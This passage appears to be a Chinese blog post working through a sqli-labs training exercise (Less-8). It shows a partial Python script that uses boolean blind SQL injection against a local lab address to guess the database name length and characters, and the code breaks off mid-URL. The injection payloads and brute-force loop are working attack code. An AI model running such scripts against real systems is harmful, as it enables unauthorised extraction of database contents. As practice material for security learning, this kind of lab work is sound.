在这里插入代码片
import requests
#连接对象
req=''
#数据库长度:
DATA_LEN=1
#数据库名字
DATANAME=''
#表的名字
TABLE_NAME=[]
#表的个数
TABLE_SUM=1
#字段个数
ZIDUAN_SUM=[]
#每个字段长度
ZIDUAN_LEN=[]
#字段里最长的
MAX_LEN=1
#字段名字
ZIDUAN_NAME=[]
#名字字典
STR= '0123456789abcdefghijklmnopqrstuvwxyz_'
#创建连接对象
def req():
global req
req=requests.session()
#猜测数据库名字长度
def database_len():
global DATA_LEN
for i in range(20):
lenurl=f'http://192.168.100.200:8004/Less-8/?id=1%27+and+LENGTH%28DATABASE%28%29%29%3D{i}%23'
retu=req.get(lenurl)
if judge(retu.text):
print(f'长度为{i}')
DATA_LEN=i
#5.猜数据库名字
def database_name():
data_name1=''
global DATANAME
for i in range(1,DATA_LEN+1):
for j in STR:
zimuurl=f'http://192.168.100.200:8004/Less-8/?id=1%27+and+substring%28database%2
sql盲注猜字段名
最新推荐文章于 2024-04-07 21:19:30 发布